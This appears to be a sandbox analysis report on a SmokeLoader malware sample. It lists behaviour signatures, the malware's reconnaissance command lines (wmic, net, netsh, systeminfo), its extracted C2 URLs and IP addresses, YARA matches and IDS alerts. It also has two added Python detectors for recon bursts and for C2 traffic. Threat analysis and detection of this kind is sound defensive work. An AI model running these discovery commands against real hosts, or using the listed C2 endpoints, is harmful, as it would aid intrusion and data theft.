
Windows Analysis Report
ctMI3TYXpX.exe

Overview

General Information

Sample name: ctMI3TYXpX.exe (renamed because the original name is a hash value)
Original sample name: a27775738faff754dcf5c3e8e42b9838.exe
Analysis ID: 1528581
MD5: a27775738faff754dcf5c3e8e42b9838
SHA1: ef3bcdfbc99ca65cf6ae2b550da3b9c4451db2a7
SHA256: ba8fcbecaf19e5da453aafbcb716c6ba46980d64ad1c86ce17cee7426c042bcc
Tags: exe, Stealc, user-abuse_ch

Detection

SmokeLoader
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected SmokeLoader
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Creates a thread in another existing process (thread injection)
Deletes itself after installation
Found evasive API chain (may stop execution after checking mutex)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the windows firewall
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive service information (via WMI, Win32_StartupCommand, often done to detect sandboxes)
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses ipconfig to lookup or modify the Windows network settings
Uses netsh to modify the Windows network and firewall settings
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the current domain controller via net
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Suspicious Group And Account Reconnaissance Activity Using Net.EXE
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • ctMI3TYXpX.exe (PID: 7340 cmdline: "C:\Users\user\Desktop\ctMI3TYXpX.exe" MD5: A27775738FAFF754DCF5C3E8E42B9838)
    • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
      • 35DB.exe (PID: 7964 cmdline: C:\Users\user\AppData\Local\Temp\35DB.exe MD5: 366910063EF4A518B6ADF6D28C7B2C69)
      • B972.exe (PID: 2104 cmdline: C:\Users\user\AppData\Local\Temp\B972.exe MD5: 65AEAA0A0849CB3CE9BC15BCBF0B7B9F)
        • cmd.exe (PID: 396 cmdline: cmd MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7388 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • WMIC.exe (PID: 5752 cmdline: wmic /namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 3336 cmdline: wmic /namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 5572 cmdline: wmic /namespace:\\root\SecurityCenter2 Path AntiSpywareProduct Get displayName /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 7620 cmdline: wmic /namespace:\\root\cimv2 Path Win32_Processor Get Name,DeviceID,NumberOfCores /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 3412 cmdline: wmic /namespace:\\root\cimv2 Path Win32_Product Get Name,Version /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 3060 cmdline: wmic /namespace:\\root\cimv2 Path Win32_NetworkAdapter Where PhysicalAdapter=TRUE Get Name,MACAddress,ProductName,ServiceName,NetConnectionID /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 2200 cmdline: wmic /namespace:\\root\cimv2 Path Win32_StartupCommand Get Name,Location,Command /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 6252 cmdline: wmic /namespace:\\root\cimv2 Path Win32_OperatingSystem Get Caption,CSDVersion,BuildNumber,Version,BuildType,CountryCode,CurrentTimeZone,InstallDate,LastBootUpTime,Locale,OSArchitecture,OSLanguage,OSProductSuite,OSType,SystemDirectory,Organization,RegisteredUser,SerialNumber /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 6452 cmdline: wmic /namespace:\\root\cimv2 Path Win32_Process Get Caption,CommandLine,ExecutablePath,ProcessId /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 6804 cmdline: wmic /namespace:\\root\cimv2 Path Win32_Volume Get Name,Label,FileSystem,SerialNumber,BootVolume,Capacity,DriveType /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 7004 cmdline: wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 1740 cmdline: wmic /namespace:\\root\cimv2 Path Win32_GroupUser Get GroupComponent,PartComponent /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 1712 cmdline: wmic /namespace:\\root\cimv2 Path Win32_ComputerSystem Get Caption,Manufacturer,PrimaryOwnerName,UserName,Workgroup /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 7788 cmdline: wmic /namespace:\\root\cimv2 Path Win32_PnPEntity Where ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}" Get Name,DeviceID,PNPDeviceID,Manufacturer,Description /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • ipconfig.exe (PID: 1284 cmdline: ipconfig /displaydns MD5: 62F170FB07FDBB79CEB7147101406EB8)
          • ROUTE.EXE (PID: 3912 cmdline: route print MD5: 3C97E63423E527BA8381E81CBA00B8CD)
          • netsh.exe (PID: 1432 cmdline: netsh firewall show state MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
          • systeminfo.exe (PID: 2872 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)
          • tasklist.exe (PID: 7792 cmdline: tasklist /v /fo csv MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
          • net.exe (PID: 5948 cmdline: net accounts /domain MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
            • net1.exe (PID: 928 cmdline: C:\Windows\system32\net1 accounts /domain MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
          • net.exe (PID: 5104 cmdline: net share MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
            • net1.exe (PID: 5296 cmdline: C:\Windows\system32\net1 share MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
          • net.exe (PID: 2908 cmdline: net user MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
      • explorer.exe (PID: 6796 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
      • explorer.exe (PID: 7496 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
      • explorer.exe (PID: 5804 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
      • explorer.exe (PID: 7524 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
      • explorer.exe (PID: 5088 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
      • explorer.exe (PID: 4092 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
  • jghruer (PID: 7756 cmdline: C:\Users\user\AppData\Roaming\jghruer MD5: A27775738FAFF754DCF5C3E8E42B9838)
  • hdhruer (PID: 8148 cmdline: C:\Users\user\AppData\Roaming\hdhruer MD5: 366910063EF4A518B6ADF6D28C7B2C69)
  • msiexec.exe (PID: 5436 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
  • cleanup
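The process tree above is a textbook host-reconnaissance burst: one cmd.exe (PID 396, itself a child of the dropped B972.exe) launches a dozen discovery tools in sequence, including the three SecurityCenter2 WMI queries that enumerate installed AV, firewall and anti-spyware products. The following is an added detection example, not Joe Sandbox or SmokeLoader code: it reads process-creation events (the ProcEvent record, the epoch timestamps and the PIDs are constructed to mirror the tree) and flags any parent whose children cover several distinct recon categories within a short window, which is far more specific than alerting on any single `wmic` or `net` invocation.

```python
"""Detect a command-line reconnaissance burst: one parent process launching
many discovery tools (wmic SecurityCenter2/cimv2 queries, net, netsh,
systeminfo, tasklist, route, ipconfig) within a short time window.

Added example; not Joe Sandbox or SmokeLoader code. ProcEvent, the
timestamps and the thresholds are constructed/assumed; the command lines
mirror the process tree in the report.
"""
import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    ts: float       # seconds; constructed (a real feed gives Sysmon EID 1 / 4688 times)
    pid: int
    ppid: int
    cmdline: str    # full command line, argv[0] included


def split_cmd(cmdline):
    """Return (program, args): program is the basename of argv[0], lowercased
    and without a trailing .exe; args is the remainder of the line."""
    m = re.match(r'\s*(?:"([^"]+)"|(\S+))\s*(.*)', cmdline, re.DOTALL)
    if not m:
        return "", ""
    prog = (m.group(1) or m.group(2)).rsplit("\\", 1)[-1].lower()
    if prog.endswith(".exe"):
        prog = prog[:-4]
    return prog, m.group(3)


# (program, regex over args, technique label). First match wins.
RECON_PATTERNS = [
    ("wmic", r"securitycenter2\b.*\b(antivirus|firewall|antispyware)product\b", "security-product discovery"),
    ("wmic", r"\bwin32_(processor|computersystem|operatingsystem|bios|baseboard|pnpentity)\b", "system/VM fingerprinting"),
    ("wmic", r"\bwin32_(useraccount|groupuser)\b", "account discovery"),
    ("wmic", r"\bwin32_(process|startupcommand|product)\b", "software/process discovery"),
    ("wmic", r"\bwin32_(networkadapter|volume)\b", "device discovery"),
    ("net", r"^(accounts|user|share|group|localgroup)\b", "account/share discovery"),
    ("netsh", r"^(advfirewall|firewall)\b.*\bshow\b", "firewall discovery"),
    ("systeminfo", r".*", "system discovery"),
    ("tasklist", r".*", "process discovery"),
    ("route", r"^print\b", "network config discovery"),
    ("ipconfig", r"^/(displaydns|all)\b", "network config discovery"),
]
COMPILED = [(p, re.compile(rx, re.IGNORECASE), label) for p, rx, label in RECON_PATTERNS]


def classify(cmdline):
    """Map one command line to a recon label, or None if it is not recon."""
    prog, args = split_cmd(cmdline)
    for p, rx, label in COMPILED:
        if p == prog and rx.search(args):
            return label
    return None


def find_recon_bursts(events, window=60.0, min_distinct=4):
    """Return {parent_pid: sorted labels} for every parent whose children cover
    at least `min_distinct` distinct recon categories inside `window` seconds."""
    by_parent = defaultdict(list)
    for ev in sorted(events, key=lambda e: e.ts):
        label = classify(ev.cmdline)
        if label:
            by_parent[ev.ppid].append((ev.ts, label))
    hits = {}
    for ppid, items in by_parent.items():
        for i, (t0, _) in enumerate(items):          # sliding window per parent
            labels = {lab for t, lab in items[i:] if t - t0 <= window}
            if len(labels) >= min_distinct:
                hits[ppid] = sorted(labels)
                break
    return hits


T0 = 1728350000.0  # constructed epoch base
EVENTS = [  # constructed; command lines taken from the report's process tree
    ProcEvent(T0 + 0.0, 396, 2104, "cmd"),
    ProcEvent(T0 + 1.0, 5752, 396, r"wmic /namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /format:csv"),
    ProcEvent(T0 + 2.0, 7620, 396, r"wmic /namespace:\\root\cimv2 Path Win32_Processor Get Name,DeviceID,NumberOfCores /format:csv"),
    ProcEvent(T0 + 3.0, 2200, 396, r"wmic /namespace:\\root\cimv2 Path Win32_StartupCommand Get Name,Location,Command /format:csv"),
    ProcEvent(T0 + 4.0, 3060, 396, r"wmic /namespace:\\root\cimv2 Path Win32_NetworkAdapter Where PhysicalAdapter=TRUE Get Name,MACAddress /format:csv"),
    ProcEvent(T0 + 5.0, 7004, 396, r"wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,SID /format:csv"),
    ProcEvent(T0 + 6.0, 1284, 396, "ipconfig /displaydns"),
    ProcEvent(T0 + 7.0, 3912, 396, "route print"),
    ProcEvent(T0 + 8.0, 1432, 396, "netsh firewall show state"),
    ProcEvent(T0 + 9.0, 2872, 396, "systeminfo"),
    ProcEvent(T0 + 10.0, 7792, 396, "tasklist /v /fo csv"),
    ProcEvent(T0 + 11.0, 5948, 396, "net accounts /domain"),
    ProcEvent(T0 + 12.0, 5104, 396, "net share"),
    # benign control: an admin running one command from a different shell
    ProcEvent(T0 + 500.0, 6100, 1200, "ipconfig /all"),
]

if __name__ == "__main__":
    for ppid, labels in find_recon_bursts(EVENTS).items():
        print(f"recon burst under parent PID {ppid}: {', '.join(labels)}")
```

The window and the `min_distinct` threshold are tuning knobs: administrators do run `systeminfo` or `net user`, but rarely ten different discovery commands from one shell inside a minute, and almost never the SecurityCenter2 product enumeration.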
Name: SmokeLoader
Description: The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual download returns an HTTP 404 but still contains data in the response body.
Attribution: SMOKY SPIDER
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader
Extracted configuration: {"Version": 2022, "C2 list": ["https://ninjahallnews.com/search.php", "https://fallhandbat.com/search.php"]}
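The description above gives the network analyst two handles: the decoy requests to legitimate sites, and the real check-in that comes back as an HTTP 404 whose body still carries data. Ordinary 404 responses are small HTML pages; an encrypted module or command blob is not. The scorer below is an added example (not from the report, Malpedia or Joe Sandbox) that applies both observations to HTTP transaction records. The C2 URLs are the two from the extracted configuration; the transaction records, the 256-byte and 7.0-bit thresholds and the `triage` threshold are constructed assumptions.

```python
"""Score HTTP exchanges for the SmokeLoader C2 pattern: a request to a known
C2 URL, or a request answered with HTTP 404 that nevertheless carries a
non-HTML, high-entropy body.

Added example; not report, Malpedia or sandbox code. C2_URLS comes from the
extracted configuration; transactions and thresholds are constructed.
"""
import math
from collections import Counter
from urllib.parse import urlsplit

C2_URLS = [
    "https://ninjahallnews.com/search.php",
    "https://fallhandbat.com/search.php",
]
C2_HOST_PATHS = {(urlsplit(u).hostname, urlsplit(u).path) for u in C2_URLS}


def shannon_entropy(data):
    """Bits per byte: ~8.0 for encrypted/compressed data, ~4-5 for HTML/text."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def looks_like_html(body):
    head = body.lstrip()[:128].lower()
    return any(tag in head for tag in (b"<!doctype", b"<html", b"<head", b"<body"))


def score_transaction(tx):
    """Return (score, reasons); each matched heuristic adds one point."""
    reasons = []
    if (tx["host"], tx["path"]) in C2_HOST_PATHS:
        reasons.append("URL is in the extracted SmokeLoader C2 list")
    body = tx["body"]
    if tx["status"] == 404:
        if tx["method"] == "POST":
            reasons.append("POST answered with 404")
        if len(body) >= 256 and not looks_like_html(body):
            reasons.append("404 with %d-byte non-HTML body" % len(body))
        ent = shannon_entropy(body)
        if ent > 7.0:
            reasons.append("404 body entropy %.2f bits/byte (likely encrypted payload)" % ent)
    return len(reasons), reasons


def triage(transactions, threshold=2):
    """(index, score, reasons) for every transaction scoring >= threshold."""
    out = []
    for i, tx in enumerate(transactions):
        score, reasons = score_transaction(tx)
        if score >= threshold:
            out.append((i, score, reasons))
    return out


# Constructed test data. The first record imitates a SmokeLoader check-in; its
# payload is a deterministic stand-in for ciphertext (131 is coprime to 256, so
# every byte value occurs exactly four times and the entropy is exactly 8.0).
ENCRYPTED_LIKE = bytes((i * 131 + 7) % 256 for i in range(1024))
HTML_404 = (b"<!DOCTYPE html><html><head><title>404 Not Found</title></head>"
            b"<body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>")

TRANSACTIONS = [
    {"method": "POST", "host": "ninjahallnews.com", "path": "/search.php", "status": 404, "body": ENCRYPTED_LIKE},
    {"method": "GET", "host": "www.microsoft.com", "path": "/nonexistent", "status": 404, "body": HTML_404},  # decoy-style
    {"method": "GET", "host": "www.bing.com", "path": "/", "status": 200, "body": HTML_404},
    {"method": "GET", "host": "www.adobe.com", "path": "/missing.txt", "status": 404, "body": b"Not Found"},
]

if __name__ == "__main__":
    for i, score, reasons in triage(TRANSACTIONS):
        tx = TRANSACTIONS[i]
        print(f"[{score}] {tx['method']} {tx['host']}{tx['path']} -> {tx['status']}: {'; '.join(reasons)}")
```

The body heuristics matter more than the URL match: the C2 list changes from build to build, whereas a 404 that hands back a kilobyte of ciphertext is a property of the protocol itself. On TLS (the 23.145.40.168:443 traffic in this report) the heuristic needs a decrypting proxy or an endpoint agent; on plain HTTP (180.75.11.133:80) it works straight off the wire.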
Source | Rule | Description | Author (matched strings listed beneath each row)
00000008.00000002.2574353685.00000000004A0000.00000040.00000020.00020000.00000000.sdmp | Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown
  • 0x1236f:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000006.00000002.2327173692.00000000005B0000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Smokeloader_3687686f | unknown | unknown
  • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000002.1726159167.00000000004B0000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Smokeloader_3687686f | unknown | unknown
  • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000008.00000002.2576258561.0000000001FF1000.00000004.10000000.00040000.00000000.sdmp | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security
00000008.00000002.2576258561.0000000001FF1000.00000004.10000000.00040000.00000000.sdmp | Windows_Trojan_Smokeloader_4e31426e | unknown | unknown
  • 0x1e4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
(table truncated; the full report lists 23 entries)

    System Summary

Source: Process started
  Author: Max Altgelt (Nextron Systems)
  Data: Command: C:\Users\user\AppData\Roaming\jghruer, CommandLine: C:\Users\user\AppData\Roaming\jghruer, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\jghruer, NewProcessName: C:\Users\user\AppData\Roaming\jghruer, OriginalFileName: C:\Users\user\AppData\Roaming\jghruer, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\user\AppData\Roaming\jghruer, ProcessId: 7756, ProcessName: jghruer
Source: Process started
  Author: Florian Roth (Nextron Systems), omkar72, @svch0st, Nasreddine Bencherchali (Nextron Systems)
  Data: Command: net accounts /domain, CommandLine: net accounts /domain, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: cmd, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 396, ParentProcessName: cmd.exe, ProcessCommandLine: net accounts /domain, ProcessId: 5948, ProcessName: net.exe
Source: Process started
  Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community
  Data: Command: wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv , CommandLine: wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv , CommandLine|base64offset|contains: h, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: cmd, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 396, ParentProcessName: cmd.exe, ProcessCommandLine: wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv , ProcessId: 7004, ProcessName: WMIC.exe
Source: Process started
  Author: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements)
  Data: Command: net accounts /domain, CommandLine: net accounts /domain, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: cmd, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 396, ParentProcessName: cmd.exe, ProcessCommandLine: net accounts /domain, ProcessId: 5948, ProcessName: net.exe
Source: Process started
  Author: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'
  Data: Command: route print, CommandLine: route print, CommandLine|base64offset|contains: , Image: C:\Windows\System32\ROUTE.EXE, NewProcessName: C:\Windows\System32\ROUTE.EXE, OriginalFileName: C:\Windows\System32\ROUTE.EXE, ParentCommandLine: cmd, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 396, ParentProcessName: cmd.exe, ProcessCommandLine: route print, ProcessId: 3912, ProcessName: ROUTE.EXE
Timestamp | SID | Severity | Classtype | Source -> Destination | Protocol
2024-10-08T03:14:22.194672+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4:49736 -> 180.75.11.133:80 | TCP
2024-10-08T03:14:23.607928+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4:49737 -> 180.75.11.133:80 | TCP
2024-10-08T03:14:24.986323+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4:49738 -> 180.75.11.133:80 | TCP
2024-10-08T03:14:26.372379+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4:49739 -> 180.75.11.133:80 | TCP
2024-10-08T03:14:27.804881+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4:49740 -> 180.75.11.133:80 | TCP
2024-10-08T03:14:29.188524+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4:49741 -> 180.75.11.133:80 | TCP
2024-10-08T03:14:30.567066+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4:49742 -> 180.75.11.133:80 | TCP
2024-10-08T03:14:31.967427+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4:49743 -> 180.75.11.133:80 | TCP
2024-10-08T03:14:33.349888+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4:49744 -> 180.75.11.133:80 | TCP
2024-10-08T03:14:34.724537+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4:49745 -> 180.75.11.133:80 | TCP
2024-10-08T03:14:36.129091+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4:49746 -> 180.75.11.133:80 | TCP
2024-10-08T03:14:37.511221+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4:49747 -> 180.75.11.133:80 | TCP
2024-10-08T03:14:38.888606+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4:49748 -> 180.75.11.133:80 | TCP
2024-10-08T03:14:40.294985+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4:49749 -> 180.75.11.133:80 | TCP
2024-10-08T03:14:41.687004+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4:49750 -> 180.75.11.133:80 | TCP
2024-10-08T03:14:43.070323+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4:49751 -> 180.75.11.133:80 | TCP
2024-10-08T03:14:44.453846+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4:49752 -> 180.75.11.133:80 | TCP
2024-10-08T03:14:46.078180+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4:49753 -> 180.75.11.133:80 | TCP
2024-10-08T03:14:47.954405+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4:49754 -> 180.75.11.133:80 | TCP
2024-10-08T03:14:49.384205+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4:49755 -> 180.75.11.133:80 | TCP
2024-10-08T03:14:50.822470+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4:49756 -> 180.75.11.133:80 | TCP
2024-10-08T03:14:52.232319+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4:49758 -> 180.75.11.133:80 | TCP
2024-10-08T03:14:53.619316+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4:49759 -> 180.75.11.133:80 | TCP
2024-10-08T03:14:55.012096+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4:49760 -> 180.75.11.133:80 | TCP
2024-10-08T03:14:57.758027+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4:49773 -> 180.75.11.133:80 | TCP
2024-10-08T03:14:59.141611+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4:49784 -> 180.75.11.133:80 | TCP
2024-10-08T03:15:00.543733+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4:49795 -> 180.75.11.133:80 | TCP
2024-10-08T03:15:01.943079+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4:49803 -> 180.75.11.133:80 | TCP
2024-10-08T03:15:03.347158+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4:49812 -> 180.75.11.133:80 | TCP
2024-10-08T03:15:04.734946+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4:49822 -> 180.75.11.133:80 | TCP
2024-10-08T03:15:06.122207+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4:49831 -> 180.75.11.133:80 | TCP
2024-10-08T03:15:07.506497+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4:49841 -> 180.75.11.133:80 | TCP
2024-10-08T03:15:19.207418+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4:49915 -> 23.145.40.168:443 | TCP
2024-10-08T03:15:20.940399+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4:49924 -> 23.145.40.168:443 | TCP
2024-10-08T03:15:21.924039+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4:49935 -> 23.145.40.168:443 | TCP
2024-10-08T03:15:23.127857+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4:49942 -> 23.145.40.168:443 | TCP
2024-10-08T03:15:24.007314+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4:49951 -> 23.145.40.168:443 | TCP
2024-10-08T03:15:24.904929+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4:49959 -> 23.145.40.168:443 | TCP
2024-10-08T03:15:25.814603+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4:49965 -> 23.145.40.168:443 | TCP
2024-10-08T03:15:26.719338+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4:49971 -> 23.145.40.168:443 | TCP
2024-10-08T03:15:27.642402+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4:49977 -> 23.145.40.168:443 | TCP
2024-10-08T03:15:28.579765+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4:49983 -> 23.145.40.168:443 | TCP
2024-10-08T03:15:29.478717+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4:49989 -> 23.145.40.168:443 | TCP
2024-10-08T03:15:30.411627+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4:49995 -> 23.145.40.168:443 | TCP
